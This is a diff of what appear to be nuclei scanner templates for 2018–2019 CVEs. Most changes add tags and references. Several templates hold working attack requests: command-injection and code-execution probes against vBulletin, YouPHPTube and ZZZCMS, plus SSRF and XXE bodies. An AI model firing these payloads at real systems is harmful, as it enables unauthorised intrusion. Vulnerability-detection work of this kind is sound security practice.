description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
|
||||
tags: cve,cve2018,oracle,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2018-3167
|
||||
|
||||
info:
|
||||
name: Unauthenticated Blind SSRF in Oracle EBS
|
||||
author: geeknik
|
||||
severity: low
|
||||
description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
|
||||
tags: cve,cve2018,oracle,ebs,ssrf
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
|
||||
|
||||
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80">
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Unexpected text in DTD'
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -3,6 +3,8 @@ info:
|
|||
name: node-srv Path Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://hackerone.com/reports/309124
|
||||
tags: cve,cve2018,nodejs,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Rails CVE-2018-3760
|
||||
author: 0xrudra
|
||||
severity: high
|
||||
tags: cve,cve2018,rails,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Atlassian Confluence Status-List XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
tags: cve,cve2018,atlassian,confluence,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: AnchorCMS Error Log Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
tags: cve,cve2018,anchorcms,logs
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: uWSGI PHP Plugin Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2018,uwsgi,php,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache ActiveMQ XSS
|
||||
author: pd-team
|
||||
severity: medium
|
||||
tags: cve,cve2018,apache,activemq,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: high
|
||||
description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
|
||||
tags: cve,cve2018,apache,ofbiz,xxe
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache mod_proxy HTML Injection / Partial XSS
|
||||
author: pd-team
|
||||
severity: medium
|
||||
tags: cve,cve2019,apache,htmli
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,8 +4,9 @@ info:
|
|||
name: Timesheet 1.5.3 - Cross Site Scripting
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
|
||||
tags: cve,cve2019,timesheet,xss
|
||||
|
||||
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
|
||||
# Google-Dork: inurl:"/timesheet/login.php"
|
||||
# Demo: http://www.mdh-tz.info/
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
tags: cve,cve2019,jenkins,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: exposed_pprof
|
||||
author: 0xceeb
|
||||
severity: medium
|
||||
tags: cve,cve2019,debug
|
||||
|
||||
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
|
||||
# http://mmcloughlin.com/posts/your-pprof-is-showing
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
|
||||
author: organiccrap
|
||||
severity: high
|
||||
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
|
||||
reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
|
||||
tags: cve,cve2019,pulsesecure,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2019,atlassian,rce
|
||||
|
||||
# Atlassian Crowd and Crowd Data Center
|
||||
# had the pdkinstall development plugin incorrectly enabled in release builds.
|
||||
|
|
|
@ -6,9 +6,7 @@ info:
|
|||
author: ree4pwn
|
||||
severity: critical
|
||||
reference: https://github.com/jas502n/CVE-2019-11581
|
||||
product: Jira
|
||||
|
||||
# This is detection template only, use the referenced link for the exploitation.
|
||||
tags: cve,cve2019,atlassian,jira,ssti,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -15,6 +15,7 @@ info:
|
|||
References:
|
||||
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
|
||||
- https://wpscan.com/vulnerability/9254
|
||||
tags: cve,cve2019,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Deltek Maconomy 2.2.5 LFIl
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2019,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WebPort 1.19.1 - Reflected Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: cve,cve2019,xss
|
||||
|
||||
# Vendor Homepage: https://webport.se/
|
||||
# Software Link: https://webport.se/nedladdningar/
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: IIceWarp <=10.4.4 - Local File Inclusion
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
tags: cve,cve2019,lfi
|
||||
|
||||
# reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593
|
||||
# Google Dork:-Powered By IceWarp 10.4.4
|
||||
|
|
|
@ -12,6 +12,7 @@ info:
|
|||
references: |
|
||||
- https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
|
||||
- https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
|
||||
tags: cve,cve2019,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Alfresco Share Open Redirect
|
||||
author: pd-team
|
||||
severity: low
|
||||
tags: cve,cve2019,redirect
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Odoo 12.0 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2019,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,9 +4,8 @@ info:
|
|||
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
|
||||
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-14696
|
||||
# Vendor Homepage: [https://open-school.org/]
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696
|
||||
tags: cve,cve2019,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: low
|
||||
tags: cve,cve2019,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -3,21 +3,23 @@ info:
|
|||
author: bing0o
|
||||
name: Grafana unauthenticated API
|
||||
severity: medium
|
||||
tags: cve,cve2019,grafana
|
||||
|
||||
requests:
|
||||
- body: >-
|
||||
{"dashboard":
|
||||
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
|
||||
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
|
||||
3600}
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
Host: '{{Hostname}}'
|
||||
User-Agent: Mozilla/5.0
|
||||
- raw:
|
||||
- |
|
||||
POST /api/snapshots HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Content-Length: 235
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: application/json
|
||||
|
||||
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
||||
|
||||
matchers:
|
||||
- part: body
|
||||
type: word
|
||||
words:
|
||||
- deleteKey
|
||||
method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/api/snapshots'
|
||||
|
|
|
@ -4,9 +4,8 @@ info:
|
|||
name: Webmin <= 1.920 Unauhenticated Remote Command Execution
|
||||
author: bp0lr
|
||||
severity: high
|
||||
|
||||
# Refrence:-https://www.exploit-db.com/exploits/47293
|
||||
# Refrence:-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
|
||||
reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
|
||||
tags: cve,cve2019,webmin,rce
|
||||
|
||||
requests:
|
||||
- raw: #
|
||||
|
|
|
@ -13,6 +13,7 @@ info:
|
|||
|
||||
Source/References:
|
||||
- https://github.com/GeneralEG/CVE-2019-15858
|
||||
tags: cve,cve2019,wordpress,wp-pluing,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,8 +4,8 @@ info:
|
|||
author: pikpikcu
|
||||
name: nostromo 1.9.6 - Remote Code Execution
|
||||
severity: critical
|
||||
|
||||
# Source: https://www.exploit-db.com/raw/47837
|
||||
reference: https://www.exploit-db.com/raw/47837
|
||||
tags: cve,cve2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
tags: cve,cve2019,cisco
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: rConfig 3.9.2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
# Source:-https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
|
||||
reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
|
||||
tags: cve,cve2019,rce,intrusive
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,25 +0,0 @@
|
|||
id: CVE-2019-16759-1
|
||||
|
||||
info:
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Version"
|
|
@ -1,20 +1,20 @@
|
|||
id: CVE-2019-16759
|
||||
|
||||
info:
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4
|
||||
author: dwisiswant0
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
|
||||
tags: cve,cve2019,vbulletin,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
|
||||
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
|
||||
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -22,4 +22,4 @@ requests:
|
|||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent:1337"
|
||||
- "PHP Version"
|
||||
|
|
|
@ -5,9 +5,8 @@ info:
|
|||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
|
||||
|
||||
# References:
|
||||
# - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
|
||||
reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
|
||||
tags: cve,cve2019,dlink,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Zabbix Authentication Bypass
|
||||
author: Harsh Bothra
|
||||
severity: critical
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17382
|
||||
tags: cve,cve2019,zabbix
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
|
||||
tags: cve,cve2019,dlink
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -4,9 +4,10 @@ info:
|
|||
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce
|
||||
|
||||
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,8 +4,8 @@ info:
|
|||
name: Openfire Full Read SSRF
|
||||
author: pdteam - nuclei.projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
refrense: https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
tags: cve,cve2019,ssrf
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
tags: cve,cve2019,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Citrix ADC Directory Traversal
|
||||
author: organiccrap
|
||||
severity: high
|
||||
tags: cve,cve2019,citrix,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: phpMyChat-Plus XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
tags: cve,cve2019,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,8 +4,8 @@ info:
|
|||
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
|
||||
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
# Source:- https://www.exploit-db.com/exploits/48698
|
||||
refrense: https://www.exploit-db.com/exploits/48698
|
||||
tags: cve,cve2019,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,10 +4,10 @@ info:
|
|||
name: Neon Dashboard - XSS Reflected
|
||||
author: knassar702
|
||||
severity: medium
|
||||
description: |
|
||||
An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
|
||||
Source/References:
|
||||
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
|
||||
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
|
||||
refrense: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
|
||||
tags: cve,cve2019,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Oracle Business Intelligence Path Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2019,oracle,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Oracle WebLogic Server - Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2019,oracle,weblogic,rce
|
||||
|
||||
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
|
||||
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-3396
|
||||
info:
|
||||
author: "Harsh Bothra"
|
||||
name: "Atlassian Confluence Path Traversal"
|
||||
author: Harsh Bothra
|
||||
name: Atlassian Confluence Path Traversal
|
||||
severity: high
|
||||
|
||||
# https://github.com/x-f1v3/CVE-2019-3396
|
||||
refrense: https://github.com/x-f1v3/CVE-2019-3396
|
||||
tags: cve,cve2019,atlassian,confluence,traversal,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -5,8 +5,8 @@ info:
|
|||
author: pdteam
|
||||
severity: medium
|
||||
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
|
||||
|
||||
# Source:- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
|
||||
refrense: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
|
||||
tags: cve,cve2019,atlassian,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: Spring-Cloud-Config-Server Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2019,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2019-5127
|
||||
|
||||
info:
|
||||
name: YouPHPTube Encoder RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127
|
||||
tags: cve,cve2019,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127
|
||||
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
|
||||
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/objects/nuclei.txt"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid(.*)"
|
||||
- "gid(.*)"
|
||||
part: body
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: File Content Disclosure on Rails
|
||||
author: omarkurt
|
||||
severity: medium
|
||||
# reference: https://github.com/omarkurt/CVE-2019-5418
|
||||
reference: https://github.com/omarkurt/CVE-2019-5418
|
||||
tags: cve,cve2019,rails,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,14 +4,9 @@ info:
|
|||
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
|
||||
# A Cross-site scripting (XSS) vulnerability
|
||||
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
|
||||
# allows remote attackers to inject arbitrary web script or HTML
|
||||
# via the keyword parameter (aka $search_term or the Search field).
|
||||
# --
|
||||
# References:
|
||||
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
|
||||
description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
|
||||
references: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
|
||||
tags: cve,cve2019,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340
|
||||
product: Drupal
|
||||
tags: cve,cve2019,drupal,rce
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: randomrobbie
|
||||
severity: high
|
||||
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
|
||||
tags: cve,cve2019,wordpress,wp-pluing,ssrf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Zarafa WebApp Reflected XSS
|
||||
author: pd-team
|
||||
severity: low
|
||||
tags: cve,cve2019,zarafa,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,10 +4,11 @@ info:
|
|||
name: eMerge E3 1.00-06 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
refrence: https://www.exploit-db.com/exploits/47619
|
||||
tags: cve,cve2019,emerge,rce
|
||||
|
||||
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
|
||||
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
|
||||
# Refrence: https://www.exploit-db.com/exploits/47619
|
||||
|
||||
requests:
|
||||
- raw: # Default Port
|
||||
|
|
|
@ -4,6 +4,8 @@ info:
|
|||
name: Kibana Timelion Arbitrary Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
reference: https://github.com/mpgn/CVE-2019-7609
|
||||
tags: cve,cve2019,kibana,rce
|
||||
|
||||
# Kibana versions before 5.6.15 and 6.6.1
|
||||
# contain an arbitrary code execution flaw in the Timelion visualizer.
|
||||
|
@ -11,9 +13,6 @@ info:
|
|||
# that will attempt to execute javascript code.
|
||||
# This could possibly lead to an attacker executing arbitrary commands
|
||||
# with permissions of the Kibana process on the host system.
|
||||
# --
|
||||
# References:
|
||||
# - https://github.com/mpgn/CVE-2019-7609
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -3,11 +3,18 @@ info:
|
|||
name: JIRA Directory Traversal
|
||||
author: Kishore Krishna (siLLyDaddy)
|
||||
severity: medium
|
||||
tags: cve,cve2019,atlassian,jira,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- >-
|
||||
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
|
||||
- raw:
|
||||
- |
|
||||
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: deflate
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -4,8 +4,8 @@ info:
|
|||
name: JIRA Unauthenticated Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
|
||||
reference: https://www.doyler.net/security-not-included/more-jira-enumeration
|
||||
tags: cve,cve2019,atlassian,jira
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -2,8 +2,10 @@ id: CVE-2019-8451
|
|||
|
||||
info:
|
||||
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
|
||||
author: "TechbrunchFR"
|
||||
author: TechbrunchFR
|
||||
severity: medium
|
||||
reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
|
||||
tags: cve,cve2019,atlassian,jira,ssrf
|
||||
|
||||
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
|
||||
# security issue reported in August 2019.
|
||||
|
@ -13,7 +15,6 @@ info:
|
|||
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
|
||||
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
|
||||
# network resources.
|
||||
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
|
||||
# https://twitter.com/benmontour/status/1177250393220239360
|
||||
# https://twitter.com/ojensen5115/status/1176569607357730817
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Totaljs - Unathenticated Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2019,totaljs,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: Wavemaker Studio 6.6 LFI/SSRF
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2019,wavemaker,lfi,ssrf
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2019-9041
|
||||
|
||||
info:
|
||||
name: ZZZCMS 1.6.1 RCE
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-9041
|
||||
tags: cve,cve2019,zzzcms,rce
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/search/"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "phpinfo"
|
||||
- "PHP Version"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,9 +2,10 @@ id: CVE-2019-9670
|
|||
|
||||
info:
|
||||
name: Zimbra Collaboration XXE
|
||||
description: "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability."
|
||||
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
|
||||
author: ree4pwn
|
||||
severity: critical
|
||||
tags: cve,cve2019,zimbra,xxe
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -3,6 +3,8 @@ info:
|
|||
name: Artifactory Access-Admin Login Bypass
|
||||
author: akshansh
|
||||
severity: critical
|
||||
tags: cve,cve2019,artifactory
|
||||
|
||||
requests:
|
||||
- raw:
